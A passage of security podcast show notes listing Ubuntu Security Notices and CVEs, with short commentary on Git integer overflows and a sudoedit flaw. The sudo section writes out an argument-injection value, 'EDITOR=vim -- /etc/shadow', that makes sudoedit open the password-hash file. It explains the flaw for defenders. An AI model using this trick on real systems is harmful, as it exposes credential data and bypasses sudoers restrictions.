<li><a href="https://ubuntu.com/security/CVE-2023-21538">CVE-2023-21538</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5791-3-linux-kernel--azure--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5791-3">USN-5791-3</a>] Linux kernel (Azure) vulnerabilities</h3>
<ul>
<li>10 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-43750">CVE-2022-43750</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-4095">CVE-2022-4095</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-40307">CVE-2022-40307</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-39842">CVE-2022-39842</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3646">CVE-2022-3646</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3586">CVE-2022-3586</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3303">CVE-2022-3303</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3061">CVE-2022-3061</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2663">CVE-2022-2663</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-20421">CVE-2022-20421</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5793-3-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5793-3">USN-5793-3</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>17 CVEs addressed in Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-43750">CVE-2022-43750</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-41850">CVE-2022-41850</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-41849">CVE-2022-41849</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-4095">CVE-2022-4095</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-40307">CVE-2022-40307</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3977">CVE-2022-3977</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3649">CVE-2022-3649</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3623">CVE-2022-3623</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3586">CVE-2022-3586</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3646">CVE-2022-3646</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3544">CVE-2022-3544</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3543">CVE-2022-3543</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3541">CVE-2022-3541</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3303">CVE-2022-3303</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2663">CVE-2022-2663</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-20421">CVE-2022-20421</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3910">CVE-2022-3910</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5793-4-linux-kernel--ibm--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5793-4">USN-5793-4</a>] Linux kernel (IBM) vulnerabilities</h3>
<ul>
<li>17 CVEs addressed in Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-43750">CVE-2022-43750</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-41850">CVE-2022-41850</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-41849">CVE-2022-41849</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-4095">CVE-2022-4095</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-40307">CVE-2022-40307</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3977">CVE-2022-3977</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3649">CVE-2022-3649</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3623">CVE-2022-3623</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3586">CVE-2022-3586</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3646">CVE-2022-3646</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3544">CVE-2022-3544</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3543">CVE-2022-3543</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3541">CVE-2022-3541</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3303">CVE-2022-3303</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2663">CVE-2022-2663</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-20421">CVE-2022-20421</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3910">CVE-2022-3910</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5799-1-linux-kernel--oem--vulnerability">[<a href="https://ubuntu.com/security/notices/USN-5799-1">USN-5799-1</a>] Linux kernel (OEM) vulnerability</h3>
<ul>
<li>1 CVEs addressed in Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-4378">CVE-2022-4378</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5800-1-heimdal-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5800-1">USN-5800-1</a>] Heimdal vulnerabilities</h3>
<ul>
<li>4 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-44640">CVE-2022-44640</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-42898">CVE-2022-42898</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3437">CVE-2022-3437</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-44758">CVE-2021-44758</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5802-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5802-1">USN-5802-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>4 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-45934">CVE-2022-45934</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3643">CVE-2022-3643</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-42896">CVE-2022-42896</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-43945">CVE-2022-43945</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5803-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5803-1">USN-5803-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>4 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-45934">CVE-2022-45934</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3643">CVE-2022-3643</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-42896">CVE-2022-42896</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-4378">CVE-2022-4378</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5804-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5804-1">USN-5804-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>4 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-45934">CVE-2022-45934</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3643">CVE-2022-3643</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-42896">CVE-2022-42896</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-43945">CVE-2022-43945</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5801-1-vim-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5801-1">USN-5801-1</a>] Vim vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-0417">CVE-2022-0417</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0392">CVE-2022-0392</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5804-2-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5804-2">USN-5804-2</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>4 CVEs addressed in Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-45934">CVE-2022-45934</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3643">CVE-2022-3643</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-42896">CVE-2022-42896</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-43945">CVE-2022-43945</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5805-1-apache-maven-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-5805-1">USN-5805-1</a>] Apache Maven vulnerability</h3>
<ul>
<li>1 CVEs addressed in Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-26291">CVE-2021-26291</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5795-2-net-snmp-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5795-2">USN-5795-2</a>] Net-SNMP vulnerabilities</h3>
<ul>
<li>8 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-44793">CVE-2022-44793</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-44792">CVE-2022-44792</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-24810">CVE-2022-24810</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-24809">CVE-2022-24809</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-24808">CVE-2022-24808</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-24807">CVE-2022-24807</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-24806">CVE-2022-24806</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-24805">CVE-2022-24805</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5808-1-linux-kernel--ibm--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5808-1">USN-5808-1</a>] Linux kernel (IBM) vulnerabilities</h3>
<ul>
<li>4 CVEs addressed in Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-45934">CVE-2022-45934</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3643">CVE-2022-3643</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-42896">CVE-2022-42896</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-43945">CVE-2022-43945</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5810-1-usn-5810-2-usn-5810-3-git-vulnerabilities-01-16">[<a href="https://ubuntu.com/security/notices/USN-5810-1">USN-5810-1</a>, <a href="https://ubuntu.com/security/notices/USN-5810-2">USN-5810-2</a>, <a href="https://ubuntu.com/security/notices/USN-5810-3">USN-5810-3</a>] Git vulnerabilities [01:16]</h3>
<ul>
<li>2 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-41903">CVE-2022-41903</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-23521">CVE-2022-23521</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Integer overflow when parsing really long paths specified in <code>.gitattributes</code>
<ul>
<li>But depends if file is in working tree, index or both since when parsed
normally the parsing is done in chunks which mitigates the vuln</li>
<li>leads to heap reads/writes -&gt; RCE</li>
</ul>
</li>
<li>Integer overflow when using a crafted format specifier for git log or git archive
<ul>
<li>Not too common to use random format specifiers, but how many people have
wanted a prettier git log output, and copy-pasted something from stack
overflow without understanding it?</li>
<li>We talk about the provenance and integrity of code for OSS / supply chain
attacks - interesting to think about it from a configuration / data point of
view
<ul>
<li>Can ChatGPT be poisoned to spit out dangerous configs?</li>
</ul>
</li>
</ul>
</li>
</ul>
<h3 id="usn-5811-1-usn-5811-2-usn-5811-3-sudo-vulnerabilities-03-34">[<a href="https://ubuntu.com/security/notices/USN-5811-1">USN-5811-1</a>, <a href="https://ubuntu.com/security/notices/USN-5811-2">USN-5811-2</a>, <a href="https://ubuntu.com/security/notices/USN-5811-3">USN-5811-3</a>] Sudo vulnerabilities [03:34]</h3>
<ul>
<li>2 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-33070">CVE-2022-33070</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-22809">CVE-2023-22809</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Most interesting was a vuln in sudoedit - ie the command to edit a file with
sudo - launches your specified editor to edit the file</li>
<li>The editor is specified via various environment variables - <code>SUDO_EDITOR</code>,
<code>VISUAL</code> or <code>EDITOR</code> - these would normally specify the binary of the editor to
use</li>
<li>But could also include extra arguments to pass to the editor - such as
additional filenames by separating them with a double hyphen <code>--</code></li>
<li>As such a user could set their <code>EDITOR=vim -- /etc/shadow</code> - then when sudoedit
launches the editor for the originally specified file, would also launch it
with this file too</li>
<li>Allows a user to bypass possible restrictions set via <code>/etc/sudoers</code> - ie since
could be configured to only allow a user to edit say the apache config via
sudoedit</li>
</ul>
<h3 id="usn-5812-1-urllib3-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-5812-1">USN-5812-1</a>] urllib3 vulnerability</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-33503">CVE-2021-33503</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5810-2-git-regression">[<a href="https://ubuntu.com/security/notices/USN-5810-2">USN-5810-2</a>] Git regression</h3>
<ul>
<li>2 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-41903">CVE-2022-41903</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-23521">CVE-2022-23521</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5813-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5813-1">USN-5813-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>4 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-45934">CVE-2022-45934</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3643">CVE-2022-3643</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-42896">CVE-2022-42896</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-43945">CVE-2022-43945</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5814-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5814-1">USN-5814-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>4 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-45934">CVE-2022-45934</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3643">CVE-2022-3643</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-42896">CVE-2022-42896</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-4378">CVE-2022-4378</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5815-1-linux-kernel--bluefield--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5815-1">USN-5815-1</a>] Linux kernel (BlueField) vulnerabilities</h3>
<ul>
<li>10 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-43750">CVE-2022-43750</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-4095">CVE-2022-4095</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-40307">CVE-2022-40307</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-39842">CVE-2022-39842</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3646">CVE-2022-3646</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3586">CVE-2022-3586</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3303">CVE-2022-3303</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3061">CVE-2022-3061</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2663">CVE-2022-2663</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-20421">CVE-2022-20421</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5816-1-firefox-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5816-1">USN-5816-1</a>] Firefox vulnerabilities</h3>
<ul>
<li>9 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-23606">CVE-2023-23606</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-23605">CVE-2023-23605</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-23604">CVE-2023-23604</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-23603">CVE-2023-23603</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-23602">CVE-2023-23602</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-23601">CVE-2023-23601</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-23599">CVE-2023-23599</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-23598">CVE-2023-23598</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-23597">CVE-2023-23597</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5817-1-setuptools-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-5817-1">USN-5817-1</a>] Setuptools vulnerability</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-40897">CVE-2022-40897</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5818-1-php-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-5818-1">USN-5818-1</a>] PHP vulnerability</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-31631">CVE-2022-31631</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5819-1-haproxy-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-5819-1">USN-5819-1</a>] HAProxy vulnerability</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-0056">CVE-2023-0056</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5806-2-ruby-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-5806-2">USN-5806-2</a>] Ruby vulnerability</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-33621">CVE-2021-33621</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5820-1-exuberant-ctags-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-5820-1">USN-5820-1</a>] exuberant-ctags vulnerability</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-4515">CVE-2022-4515</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5821-1-wheel-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-5821-1">USN-5821-1</a>] wheel vulnerability</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-40898">CVE-2022-40898</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5822-1-samba-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5822-1">USN-5822-1</a>] Samba vulnerabilities</h3>
<ul>
<li>7 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-45141">CVE-2022-45141</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-42898">CVE-2022-42898</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-38023">CVE-2022-38023</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-37967">CVE-2022-37967</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-37966">CVE-2022-37966</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3437">CVE-2022-3437</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-20251">CVE-2021-20251</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5823-1-mysql-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5823-1">USN-5823-1</a>] MySQL vulnerabilities</h3>
<ul>
<li>20 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-21887">CVE-2023-21887</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-21883">CVE-2023-21883</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-21882">CVE-2023-21882</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-21881">CVE-2023-21881</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-21880">CVE-2023-21880</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-21879">CVE-2023-21879</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-21878">CVE-2023-21878</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-21877">CVE-2023-21877</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-21876">CVE-2023-21876</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-21875">CVE-2023-21875</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-21873">CVE-2023-21873</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-21871">CVE-2023-21871</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-21870">CVE-2023-21870</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-21869">CVE-2023-21869</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-21868">CVE-2023-21868</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-21867">CVE-2023-21867</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-21863">CVE-2023-21863</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-21840">CVE-2023-21840</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-21836">CVE-2023-21836</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-32221">CVE-2022-32221</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5823-2-mysql-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-5823-2">USN-5823-2</a>] MySQL vulnerability</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-21840">CVE-2023-21840</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5825-1-pam-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-5825-1">USN-5825-1</a>] PAM vulnerability</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-28321">CVE-2022-28321</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5826-1-privoxy-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5826-1">USN-5826-1</a>] Privoxy vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-44543">CVE-2021-44543</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-44540">CVE-2021-44540</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5827-1-bind-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5827-1">USN-5827-1</a>] Bind vulnerabilities</h3>
<ul>
<li>3 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-3924">CVE-2022-3924</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3736">CVE-2022-3736</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3094">CVE-2022-3094</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5828-1-kerberos-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5828-1">USN-5828-1</a>] Kerberos vulnerabilities</h3>
<ul>
